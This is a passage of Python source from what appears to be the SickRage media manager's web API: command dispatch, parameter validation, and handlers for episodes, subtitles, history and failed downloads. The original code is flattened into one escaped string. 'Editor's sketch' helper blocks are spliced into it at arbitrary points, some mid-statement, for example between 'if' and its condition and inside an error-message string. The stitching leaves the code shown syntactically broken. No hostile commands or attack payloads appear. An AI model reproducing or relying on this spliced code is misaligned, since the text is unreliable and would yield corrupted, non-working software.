_responds(RESULT_ERROR, msg=""The cmd \'"" + cmd + ""\' is not supported while 
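# --- Editor's sketch: _out_as_json() above emits plain JSON, or wraps it
# in a callback invocation when the request carries ?callback= or ?jsonp=
# (JSONP). The essential transformation, self-contained:
import json

def to_json_or_jsonp(payload, callback=None):
    out = json.dumps(payload, ensure_ascii=False, sort_keys=True)
    if callback:
        out = callback + '(' + out + ');'  # JSONP: wrap for <script> use
    return out

if __name__ == '__main__':
    assert to_json_or_jsonp({'ok': 1}) == '{"ok": 1}'
    assert to_json_or_jsonp({'ok': 1}, 'cb') == 'cb({"ok": 1});'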
chaining"")\n\n if multi_commands:\n # note: if duplicate commands are issued and one has an index defined it will override\n # all others or the other way around, depending on the command order\n # THIS IS NOT A BUG!\n if cmd_index: # do we need an index dict for this cmd ?\n if cmd not in out_dict:\n out_dict[cmd] = {}\n out_dict[cmd][cmd_index] = cur_out_dict\n else:\n out_dict[cmd] = cur_out_dict\n else:\n out_dict = cur_out_dict\n\n if multi_commands: # if we had multiple commands we have to wrap it in a response dict\n out_dict = _responds(RESULT_SUCCESS, out_dict)\n else: # index / no cmd given\n out_dict = CMD_SickBeard(args, kwargs).run()\n\n return out_dict\n\n def filter_params(self, cmd, args, kwargs):\n """""" return only params kwargs that are for cmd\n and rename them to a clean version (remove ""_"")\n args are shared across all commands\n\n all args and kwargs are lowered\n\n cmd are separated by ""|"" e.g. &cmd=shows|future\n kwargs are name-spaced with ""."" e.g. show.indexerid=101501\n if a kwarg has no namespace asking it anyways (global)\n\n full e.g.\n /api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc\n\n two calls of show.seasonlist\n one has the index ""asd"" the other one ""2""\n the ""indexerid"" kwargs / params have the indexed cmd as a namespace\n and the kwarg / param ""sort"" is a used as a global\n """"""\n cur_args = []\n for arg in args:\n cur_args.append(arg.lower())\n cur_args = tuple(cur_args)\n\n cur_kwargs = {}\n for kwarg in kwargs:\n if kwarg.find(cmd + ""."") == 0:\n clean_key = kwarg.rpartition(""."")[2]\n cur_kwargs[clean_key] = kwargs[kwarg].lower()\n elif ""."" not in kwarg: # the kwarg was not name-spaced therefore a ""global""\n cur_kwargs[kwarg] = kwargs[kwarg]\n return cur_args, cur_kwargs\n\n\nclass ApiCall(ApiHandler):\n\n _help = {""desc"": ""This command is not documented. 
Please report this to the developers.""}\n\n def __init__(self, args, kwargs):\n # missing\n try:\n if self._missing:\n self.run = self.return_missing\n except AttributeError:\n pass\n\n # help\n if \'help\' in kwargs:\n self.run = self.return_help\n\n def run(self):\n # override with real output function in subclass\n return {}\n\n def return_help(self):\n try:\n if self._requiredParams:\n pass\n except AttributeError:\n self._requiredParams = []\n try:\n if self._optionalParams:\n pass\n except AttributeError:\n self._optionalParams = []\n\n for paramDict, paramType in [(self._requiredParams, ""requiredParameters""),\n (self._optionalParams, ""optionalParameters"")]:\n\n if paramType in self._help:\n for paramName in paramDict:\n if paramName not in self._help[paramType]:\n self._help[paramType][paramName] = {}\n if paramDict[paramName][""allowed_values""]:\n self._help[paramType][paramName][""allowed_values""] = paramDict[paramName][""allowed_values""]\n else:\n self._help[paramType][paramName][""allowed_values""] = ""see desc""\n self._help[paramType][paramName][""defaultValue""] = paramDict[paramName][""defaultValue""]\n self._help[paramType][paramName][""type""] = paramDict[paramName][""type""]\n\n elif paramDict:\n for paramName in paramDict:\n self._help[paramType] = {}\n self._help[paramType][paramName] = paramDict[paramName]\n else:\n self._help[paramType] = {}\n msg = ""No description available""\n if ""desc"" in self._help:\n msg = self._help[""desc""]\n return _responds(RESULT_SUCCESS, self._help, msg)\n\n def return_missing(self):\n if len(self._missing) == 1:\n msg = ""The required parameter: \'"" + self._missing[0] + ""\' was not set""\n else:\n msg = ""The required parameters: \'"" + ""\',\'"".join(self._missing) + ""\' where not set""\n return _responds(RESULT_ERROR, msg=msg)\n\n def check_params(self, args, kwargs, key, default, required, arg_type, allowed_values):\n\n """""" function to check passed params for the shorthand wrapper\n and to detect missing/required params\n """"""\n\n # auto-select indexer\n if key in indexer_ids:\n if ""tvdbid"" in kwargs:\n key = ""tvdbid""\n\n self.indexer = indexer_ids.index(key)\n\n missing = True\n org_default = default\n\n if arg_type == ""bool"":\n allowed_values = [0, 1]\n\n if args:\n default = args[0]\n missing = False\n args = args[1:]\n if kwargs.get(key):\n default = kwargs.get(key)\n missing = False\n if required:\n try:\n self._missing\n self._requiredParams.append(key)\n except AttributeError:\n self._missing = []\n self._requiredParams = {key: {""allowed_values"": allowed_values,\n ""defaultValue"": org_default,\n ""type"": arg_type}}\n\n if missing and key not in self._missing:\n self._missing.append(key)\n else:\n try:\n self._optionalParams[key] = {""allowed_values"": allowed_values,\n ""defaultValue"": org_default,\n ""type"": arg_type}\n except AttributeError:\n self._optionalParams = {key: {""allowed_values"": allowed_values,\n ""defaultValue"": org_default,\n ""type"": arg_type}}\n\n if default:\n default = self._check_param_type(default, key, arg_type)\n if arg_type == ""bool"":\n arg_type = []\n self._check_param_value(default, key, allowed_values)\n\n return default, args\n\n def _check_param_type(self, value, name, arg_type):\n """""" checks if value can be converted / parsed to arg_type\n will raise an error on failure\n or will convert it to arg_type and return new converted value\n can check for:\n - int: will be converted into int\n - bool: will be converted to False / True\n - list: will always return a 
list\n - string: will do nothing for now\n - ignore: will ignore it, just like ""string""\n """"""\n error = False\n if arg_type == ""int"":\n if _is_int(value):\n value = int(value)\n else:\n error = True\n elif arg_type == ""bool"":\n if value in (""0"", ""1""):\n value = bool(int(value))\n elif value in (""true"", ""True"", ""TRUE""):\n value = True\n elif value in (""false"", ""False"", ""FALSE""):\n value = False\n elif value not in (True, False):\n error = True\n elif arg_type == ""list"":\n value = value.split(""|"")\n elif arg_type == ""string"":\n pass\n elif arg_type == ""ignore"":\n pass\n else:\n logger.log(u\'API :: Invalid param type: ""%s"" can not be checked. Ignoring it.\' % str(arg_type), logger.ERROR)\n\n if error:\n # this is a real ApiError !!\n raise ApiError(u\'param ""%s"" with given value ""%s"" could not be parsed into ""%s""\'\n % (str(name), str(value), str(arg_type)))\n\n return value\n\n def _check_param_value(self, value, name, allowed_values):\n """""" will check if value (or all values in it ) are in allowed values\n will raise an exception if value is ""out of range""\n if bool(allowed_value) is False a check is not performed and all values are excepted\n """"""\n if allowed_values:\n error = False\n if isinstance(value, list):\n for item in value:\n if item not in allowed_values:\n error = True\n else:\n if value not in allowed_values:\n error = True\n\n if error:\n # this is kinda a ApiError but raising an error is the only way of quitting here\n raise ApiError(u""param: \'"" + str(name) + ""\' with given value: \'"" + str(\n value) + ""\' is out of allowed range \'"" + str(allowed_values) + ""\'"")\n\n\nclass TVDBShorthandWrapper(ApiCall):\n _help = {""desc"": ""This is an internal function wrapper. Call the help command directly for more information.""}\n\n def __init__(self, args, kwargs, sid):\n self.origArgs = args\n self.kwargs = kwargs\n self.sid = sid\n\n self.s, args = self.check_params(args, kwargs, ""s"", None, False, ""ignore"", [])\n self.e, args = self.check_params(args, kwargs, ""e"", None, False, ""ignore"", [])\n self.args = args\n\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" internal function wrapper """"""\n args = (self.sid,) + self.origArgs\n if self.e:\n return CMD_Episode(args, self.kwargs).run()\n elif self.s:\n return CMD_ShowSeasons(args, self.kwargs).run()\n else:\n return CMD_Show(args, self.kwargs).run()\n\n\n# ###############################\n# helper functions #\n# ###############################\n\ndef _is_int(data):\n try:\n int(data)\n except (TypeError, ValueError, OverflowError):\n return False\n else:\n return True\n\n\ndef _rename_element(dict_obj, old_key, new_key):\n try:\n dict_obj[new_key] = dict_obj[old_key]\n del dict_obj[old_key]\n except (ValueError, TypeError, NameError):\n pass\n return dict_obj\n\n\ndef _responds(result_type, data=None, msg=""""):\n """"""\n result is a string of given ""type"" (success/failure/timeout/error)\n message is a human readable string, can be empty\n data is either a dict or a array, can be a empty dict or empty array\n """"""\n return {""result"": result_type_map[result_type],\n ""message"": msg,\n ""data"": {} if not data else data}\n\n\ndef _get_status_strings(s):\n return statusStrings[s]\n\n\ndef _ordinal_to_datetime_form(ordinal):\n # workaround for episodes with no air date\n if int(ordinal) != 1:\n date = datetime.date.fromordinal(ordinal)\n else:\n return """"\n return date.strftime(dateTimeFormat)\n\n\ndef _ordinal_to_date_form(ordinal):\n if 
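# --- Editor's sketch: a condensed, standalone equivalent of the type
# coercion performed by _check_param_type() above ("int" must parse,
# "bool" accepts 0/1/true/false, "list" splits on "|"); the true/false
# case handling here is slightly broader than the original, for brevity.
def coerce_param(value, arg_type):
    if arg_type == 'int':
        return int(value)              # ValueError on unparsable input
    if arg_type == 'bool':
        if value in ('0', '1'):
            return bool(int(value))
        if str(value).lower() == 'true':
            return True
        if str(value).lower() == 'false':
            return False
        raise ValueError('not a bool: %r' % (value,))
    if arg_type == 'list':
        return value.split('|')
    return value                       # "string" / "ignore": unchanged

if __name__ == '__main__':
    assert coerce_param('1', 'bool') is True
    assert coerce_param('sdtv|hdtv', 'list') == ['sdtv', 'hdtv']
    assert coerce_param('42', 'int') == 42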
int(ordinal) != 1:\n date = datetime.date.fromordinal(ordinal)\n else:\n return """"\n return date.strftime(dateFormat)\n\n\ndef _history_date_to_datetime_form(time_string):\n date = datetime.datetime.strptime(time_string, History.date_format)\n return date.strftime(dateTimeFormat)\n\n\ndef _map_quality(show_obj):\n quality_map = _get_quality_map()\n\n any_qualities = []\n best_qualities = []\n\n i_quality_id, a_quality_id = Quality.splitQuality(int(show_obj))\n if i_quality_id:\n for quality in i_quality_id:\n any_qualities.append(quality_map[quality])\n if a_quality_id:\n for quality in a_quality_id:\n best_qualities.append(quality_map[quality])\n return any_qualities, best_qualities\n\n\ndef _get_quality_map():\n return {Quality.SDTV: \'sdtv\',\n Quality.SDDVD: \'sddvd\',\n Quality.HDTV: \'hdtv\',\n Quality.RAWHDTV: \'rawhdtv\',\n Quality.FULLHDTV: \'fullhdtv\',\n Quality.HDWEBDL: \'hdwebdl\',\n Quality.FULLHDWEBDL: \'fullhdwebdl\',\n Quality.HDBLURAY: \'hdbluray\',\n Quality.FULLHDBLURAY: \'fullhdbluray\',\n Quality.UNKNOWN: \'unknown\'}\n\n\ndef _get_root_dirs():\n if sickbeard.ROOT_DIRS == """":\n return {}\n\n root_dir = {}\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n default_index = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n\n root_dir[""default_index""] = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n # remove default_index value from list (this fixes the offset)\n root_dirs.pop(0)\n\n if len(root_dirs) < default_index:\n return {}\n\n # clean up the list - replace %xx escapes by their single-character equivalent\n root_dirs = [urllib.unquote_plus(x) for x in root_dirs]\n\n default_dir = root_dirs[default_index]\n\n dir_list = []\n for root_dir in root_dirs:\n valid = 1\n try:\n ek(os.listdir, root_dir)\n except Exception:\n valid = 0\n default = 0\n if root_dir is default_dir:\n default = 1\n\n cur_dir = {\n \'valid\': valid,\n \'location\': root_dir,\n \'default\': default\n }\n dir_list.append(cur_dir)\n\n return dir_list\n\n\nclass ApiError(Exception):\n """"""\n Generic API error\n """"""\n\n\nclass IntParseError(Exception):\n """"""\n A value could not be parsed into an int, but should be parse-able to an int\n """"""\n\n\n# -------------------------------------------------------------------------------------#\n\n\nclass CMD_Help(ApiCall):\n _help = {\n ""desc"": ""Get help about a given command"",\n ""optionalParameters"": {\n ""subject"": {""desc"": ""The name of the command to get the help of""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.subject, args = self.check_params(args, kwargs, ""subject"", ""help"", False, ""string"", function_mapper.keys())\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get help about a given command """"""\n if self.subject in function_mapper:\n out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {""help"": 1}).run())\n else:\n out = _responds(RESULT_FAILURE, msg=""No such cmd"")\n return out\n\n\nclass CMD_ComingEpisodes(ApiCall):\n _help = {\n ""desc"": ""Get the coming episodes"",\n ""optionalParameters"": {\n ""sort"": {""desc"": ""Change the sort order""},\n ""type"": {""desc"": ""One or more categories of coming episodes, separated by |""},\n ""paused"": {\n ""desc"": ""0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.sort, args = self.check_params(args, kwargs, ""sort"", ""date"", False, ""string"", ComingEpisodes.sorts.keys())\n self.type, 
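# --- Editor's sketch: sickbeard.ROOT_DIRS (parsed by _get_root_dirs()
# above) is one pipe-delimited string whose FIRST field is the index of
# the default directory, e.g. "1|/tv|/anime" makes /anime the default.
# A standalone parser for that format; note the original compares
# directories with "is", where "==" is the safe string comparison.
def parse_root_dirs(root_dirs_setting):
    if not root_dirs_setting:
        return None, []
    parts = root_dirs_setting.split('|')
    default_index = int(parts[0])
    dirs = parts[1:]                   # drop the leading index field
    return dirs[default_index], dirs

if __name__ == '__main__':
    default, dirs = parse_root_dirs('1|/tv|/anime')
    assert default == '/anime' and dirs == ['/tv', '/anime']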
args = self.check_params(args, kwargs, ""type"", \'|\'.join(ComingEpisodes.categories), False, ""list"",\n ComingEpisodes.categories)\n self.paused, args = self.check_params(args, kwargs, ""paused"", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False,\n ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the coming episodes """"""\n grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused)\n data = {section: [] for section in grouped_coming_episodes.keys()}\n\n for section, coming_episodes in grouped_coming_episodes.iteritems():\n for coming_episode in coming_episodes:\n data[section].append({\n \'airdate\': coming_episode[\'airdate\'],\n \'airs\': coming_episode[\'airs\'],\n \'ep_name\': coming_episode[\'name\'],\n \'ep_plot\': coming_episode[\'description\'],\n \'episode\': coming_episode[\'episode\'],\n \'indexerid\': coming_episode[\'indexer_id\'],\n \'network\': coming_episode[\'network\'],\n \'paused\': coming_episode[\'paused\'],\n \'quality\': coming_episode[\'quality\'],\n \'season\': coming_episode[\'season\'],\n \'show_name\': coming_episode[\'show_name\'],\n \'show_status\': coming_episode[\'status\'],\n \'tvdbid\': coming_episode[\'tvdbid\'],\n \'weekday\': coming_episode[\'weekday\']\n })\n\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_Episode(ApiCall):\n _help = {\n ""desc"": ""Get detailed information about an episode"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""episode"": {""desc"": ""The episode number""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""full_path"": {\n ""desc"": ""Return the full absolute show location (if valid, and True), or the relative show location""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])\n # optional\n self.fullPath, args = self.check_params(args, kwargs, ""full_path"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get detailed information about an episode """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n my_db = db.DBConnection(row_type=""dict"")\n sql_results = my_db.select(\n ""SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?"",\n [self.indexerid, self.e, self.s])\n if not len(sql_results) == 1:\n raise ApiError(""Episode not found"")\n episode = sql_results[0]\n # handle path options\n # absolute vs relative vs broken\n show_path = None\n try:\n show_path = show_obj.location\n except ShowDirectoryNotFoundException:\n pass\n\n if not show_path: # show dir is broken ... 
episode path will be empty\n episode[""location""] = """"\n elif not self.fullPath:\n # using the length because lstrip() removes to much\n show_path_length = len(show_path) + 1 # the / or \\ yeah not that nice i know\n episode[""location""] = episode[""location""][show_path_length:]\n\n # convert stuff to human form\n if helpers.tryInt(episode[\'airdate\'], 1) > 693595: # 1900\n episode[\'airdate\'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(int(episode[\'airdate\']), show_obj.airs, show_obj.network)), d_preset=dateFormat)\n else:\n episode[\'airdate\'] = \'Never\'\n\n status, quality = Quality.splitCompositeStatus(int(episode[""status""]))\n episode[""status""] = _get_status_strings(status)\n episode[""quality""] = get_quality_string(quality)\n episode[""file_size_human""] = pretty_file_size(episode[""file_size""])\n\n return _responds(RESULT_SUCCESS, episode)\n\n\nclass CMD_EpisodeSearch(ApiCall):\n _help = {\n ""desc"": ""Search for an episode. The response might take some time."",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""episode"": {""desc"": ""The episode number""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Search for an episode """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # retrieve the episode object and fail if we can\'t get one\n ep_obj = show_obj.getEpisode(int(self.s), int(self.e))\n if isinstance(ep_obj, str):\n return _responds(RESULT_FAILURE, msg=""Episode not found"")\n\n # make a queue item for it and put it on the queue\n ep_queue_item = search_queue.ManualSearchQueueItem(show_obj, ep_obj)\n sickbeard.searchQueueScheduler.action.add_item(ep_queue_item) # @UndefinedVariable\n\n # wait until the queue item tells us whether it worked or not\n while ep_queue_item.success is None: # @UndefinedVariable\n time.sleep(1)\n\n # return the correct json value\n if ep_queue_item.success:\n status, quality = Quality.splitCompositeStatus(ep_obj.status) # @UnusedVariable\n # TODO: split quality and status?\n return _responds(RESULT_SUCCESS, {""quality"": get_quality_string(quality)},\n ""Snatched ("" + get_quality_string(quality) + "")"")\n\n return _responds(RESULT_FAILURE, msg=\'Unable to find episode\')\n\n\nclass CMD_EpisodeSetStatus(ApiCall):\n _help = {\n ""desc"": ""Set the status of an episode or a season (when no episode is provided)"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""status"": {""desc"": ""The status of the episode or season""}\n },\n ""optionalParameters"": {\n ""episode"": {""desc"": ""The episode number""},\n ""force"": {""desc"": ""True to replace existing downloaded episode or season, False otherwise""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n 
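# --- Editor's sketch: the handler above trims the show directory off the
# episode path by slicing with len(show_path) + 1, because str.lstrip()
# strips a SET of characters rather than a prefix (lstrip('/tv/') would
# also eat leading 't's and 'v's from the remainder). os.path.relpath
# states the same intent directly:
import os

def episode_relative_location(episode_location, show_path):
    if not show_path:
        return ''                      # broken show dir -> empty location
    return os.path.relpath(episode_location, show_path)

if __name__ == '__main__':
    rel = episode_relative_location('/tv/Show/S01/ep1.mkv', '/tv/Show')
    assert rel == os.path.join('S01', 'ep1.mkv')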
self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.status, args = self.check_params(args, kwargs, ""status"", None, True, ""string"",\n [""wanted"", ""skipped"", ""ignored"", ""failed""])\n # optional\n self.e, args = self.check_params(args, kwargs, ""episode"", None, False, ""int"", [])\n self.force, args = self.check_params(args, kwargs, ""force"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Set the status of an episode or a season (when no episode is provided) """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # convert the string status to a int\n for status in statusStrings:\n if str(statusStrings[status]).lower() == str(self.status).lower():\n self.status = status\n break\n else: # if we don\'t break out of the for loop we got here.\n # the allowed values has at least one item that could not be matched against the internal status strings\n raise ApiError(""The status string could not be matched to a status. Report to Devs!"")\n\n ep_list = []\n if self.e:\n ep_obj = show_obj.getEpisode(self.s, self.e)\n if not ep_obj:\n return _responds(RESULT_FAILURE, msg=""Episode not found"")\n ep_list = [ep_obj]\n else:\n # get all episode numbers from self, season\n ep_list = show_obj.getAllEpisodes(season=self.s)\n\n def _ep_result(result_code, ep, msg=""""):\n return {\'season\': ep.season, \'episode\': ep.episode, \'status\': _get_status_strings(ep.status),\n \'result\': result_type_map[result_code], \'message\': msg}\n\n ep_results = []\n failure = False\n start_backlog = False\n segments = {}\n\n sql_l = []\n for ep_obj in ep_list:\n with ep_obj.lock:\n if self.status == WANTED:\n # figure out what episodes are wanted so we can backlog them\n if ep_obj.season in segments:\n segments[ep_obj.season].append(ep_obj)\n else:\n segments[ep_obj.season] = [ep_obj]\n\n # don\'t let them mess up UN-AIRED episodes\n if ep_obj.status == UNAIRED:\n if self.e is not None: # setting the status of an un-aired is only considered a failure if we directly wanted this episode, but is ignored on a season request\n ep_results.append(\n _ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is UN-AIRED""))\n failure = True\n continue\n\n if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS:\n ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status to FAILED because failed download handling is disabled""))\n failure = True\n continue\n\n # allow the user to force setting the status for an already downloaded episode\n if ep_obj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force:\n ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is already marked as DOWNLOADED""))\n failure = True\n continue\n\n ep_obj.status = self.status\n sql_l.append(ep_obj.get_sql())\n\n if self.status == WANTED:\n start_backlog = True\n ep_results.append(_ep_result(RESULT_SUCCESS, ep_obj))\n\n if len(sql_l) > 0:\n my_db = db.DBConnection()\n my_db.mass_action(sql_l)\n\n extra_msg = """"\n if start_backlog:\n for season, segment in segments.iteritems():\n cur_backlog_queue_item = search_queue.BacklogQueueItem(show_obj, segment)\n sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # 
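# --- Editor's sketch: before queueing backlog searches, the handler
# above groups the WANTED episodes into per-season "segments". The
# if/else it uses is the classic dict-grouping pattern; dict.setdefault
# expresses it in one line:
def group_by_season(episodes):
    segments = {}
    for ep in episodes:
        segments.setdefault(ep['season'], []).append(ep)
    return segments

if __name__ == '__main__':
    eps = [{'season': 1, 'episode': 1}, {'season': 1, 'episode': 2},
           {'season': 2, 'episode': 1}]
    segments = group_by_season(eps)
    assert sorted(segments) == [1, 2] and len(segments[1]) == 2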
@UndefinedVariable\n\n logger.log(u""API :: Starting backlog for "" + show_obj.name + "" season "" + str(\n season) + "" because some episodes were set to WANTED"")\n\n extra_msg = "" Backlog started""\n\n if failure:\n return _responds(RESULT_FAILURE, ep_results, \'Failed to set all or some status. Check data.\' + extra_msg)\n else:\n return _responds(RESULT_SUCCESS, msg=\'All status set successfully.\' + extra_msg)\n\n\nclass CMD_SubtitleSearch(ApiCall):\n _help = {\n ""desc"": ""Search for an episode subtitles. The response might take some time."",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""episode"": {""desc"": ""The episode number""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Search for an episode subtitles """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # retrieve the episode object and fail if we can\'t get one\n ep_obj = show_obj.getEpisode(int(self.s), int(self.e))\n if isinstance(ep_obj, str):\n return _responds(RESULT_FAILURE, msg=""Episode not found"")\n\n # try do download subtitles for that episode\n previous_subtitles = ep_obj.subtitles\n\n try:\n subtitles = ep_obj.download_subtitles()\n except Exception:\n return _responds(RESULT_FAILURE, msg=\'Unable to find subtitles\')\n\n # return the correct json value\n new_subtitles = frozenset(ep_obj.subtitles).difference(previous_subtitles)\n if new_subtitles:\n new_languages = [subtitles.name_from_code(code) for code in new_subtitles]\n status = \'New subtitles downloaded: %s\' % \', \'.join(new_languages)\n response = _responds(RESULT_SUCCESS, msg=\'New subtitles found\')\n else:\n status = \'No subtitles downloaded\'\n response = _responds(RESULT_FAILURE, msg=\'Unable to find subtitles\')\n\n ui.notifications.message(\'Subtitles Search\', status)\n\n return response\n\n\nclass CMD_Exceptions(ApiCall):\n _help = {\n ""desc"": ""Get the scene exceptions for all or a given show"",\n ""optionalParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", [])\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the scene exceptions for all or a given show """"""\n my_db = db.DBConnection(""cache.db"", row_type=""dict"")\n\n if self.indexerid is None:\n sql_results = my_db.select(""SELECT show_name, indexer_id AS \'indexerid\' FROM scene_exceptions"")\n scene_exceptions = {}\n for row in sql_results:\n indexerid = row[""indexerid""]\n if indexerid not in scene_exceptions:\n scene_exceptions[indexerid] = []\n scene_exceptions[indexerid].append(row[""show_name""])\n\n else:\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return 
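# --- Editor's sketch: CMD_SubtitleSearch detects fresh subtitles as a
# set difference between the language codes present after the download
# and those recorded before it:
def newly_downloaded(before, after):
    return sorted(frozenset(after) - frozenset(before))

if __name__ == '__main__':
    assert newly_downloaded(['en'], ['en', 'de', 'fr']) == ['de', 'fr']
    assert newly_downloaded(['en'], ['en']) == []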
_responds(RESULT_FAILURE, msg=""Show not found"")\n\n sql_results = my_db.select(\n ""SELECT show_name, indexer_id AS \'indexerid\' FROM scene_exceptions WHERE indexer_id = ?"",\n [self.indexerid])\n scene_exceptions = []\n for row in sql_results:\n scene_exceptions.append(row[""show_name""])\n\n return _responds(RESULT_SUCCESS, scene_exceptions)\n\n\nclass CMD_History(ApiCall):\n _help = {\n ""desc"": ""Get the downloaded and/or snatched history"",\n ""optionalParameters"": {\n ""limit"": {""desc"": ""The maximum number of results to return""},\n ""type"": {""desc"": ""Only get some entries. No value will returns every type""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", [])\n self.type, args = self.check_params(args, kwargs, ""type"", None, False, ""string"", [""downloaded"", ""snatched""])\n self.type = self.type.lower() if isinstance(self.type, str) else \'\'\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the downloaded and/or snatched history """"""\n data = History().get(self.limit, self.type)\n results = []\n\n for row in data:\n status, quality = Quality.splitCompositeStatus(int(row[""action""]))\n status = _get_status_strings(status)\n\n if self.type and not status.lower() == self.type:\n continue\n\n row[""status""] = status\n row[""quality""] = get_quality_string(quality)\n row[""date""] = _history_date_to_datetime_form(str(row[""date""]))\n\n del row[""action""]\n\n _rename_element(row, ""show_id"", ""indexerid"")\n row[""resource_path""] = ek(os.path.dirname, row[""resource""])\n row[""resource""] = ek(os.path.basename, row[""resource""])\n\n # Add tvdbid for backward compatibility\n row[\'tvdbid\'] = row[\'indexerid\']\n results.append(row)\n\n return _responds(RESULT_SUCCESS, results)\n\n\nclass CMD_HistoryClear(ApiCall):\n _help = {""desc"": ""Clear the entire history""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Clear the entire history """"""\n History().clear()\n\n return _responds(RESULT_SUCCESS, msg=""History cleared"")\n\n\nclass CMD_HistoryTrim(ApiCall):\n _help = {""desc"": ""Trim history entries older than 30 days""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Trim history entries older than 30 days """"""\n History().trim()\n\n return _responds(RESULT_SUCCESS, msg=\'Removed history entries older than 30 days\')\n\n\nclass CMD_Failed(ApiCall):\n _help = {\n ""desc"": ""Get the failed downloads"",\n ""optionalParameters"": {\n ""limit"": {""desc"": ""The maximum number of results to return""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the failed downloads """"""\n\n my_db = db.DBConnection(\'failed.db\', row_type=""dict"")\n\n u_limit = min(int(self.limit), 100)\n if u_limit == 0:\n sql_results = my_db.select(""SELECT * 